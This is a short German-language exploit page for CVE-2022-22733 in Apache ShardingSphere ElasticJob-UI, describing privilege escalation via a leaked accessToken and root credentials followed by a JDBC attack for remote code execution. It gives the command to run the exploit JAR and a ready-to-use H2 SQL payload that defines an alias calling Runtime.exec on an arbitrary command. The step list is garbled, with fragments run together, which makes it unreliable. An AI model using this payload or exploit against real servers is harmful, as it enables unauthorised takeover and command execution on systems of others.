
Apache ShardingSphere ElasticJob-UI Privilegieneskalation & RCE-Exploit
CVE-2022-22733 ist eine Schwachstelle, die Apache ShardingSphere ElasticJob-UI 3.0.0 und niedrigere Versionen betrifft. Die Schwachstelle führt zu einer Privilegieneskalation. Durch Missbrauch der eskalierten Privilegien kann ein JDBC-Angriff durchgeführt und RCE erreicht werden. Sie können die Schwachstellenanalyse hier lesen & den Blog zum Schreiben des Exploits Schritt für Schritt hier.

Der Exploit funktioniert wie folgt:
accessToken.accessToken.accessToken.root-Konto-Anmeldedaten aus den geparsten Daten.root-Konto-Anmeldedaten und Erlangen vollständiger Berechtigungen in der Anwendung.JDBC-Angriffs.Sie können die JAR-Datei hier herunterladen & den Quellcode hier.
jar:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
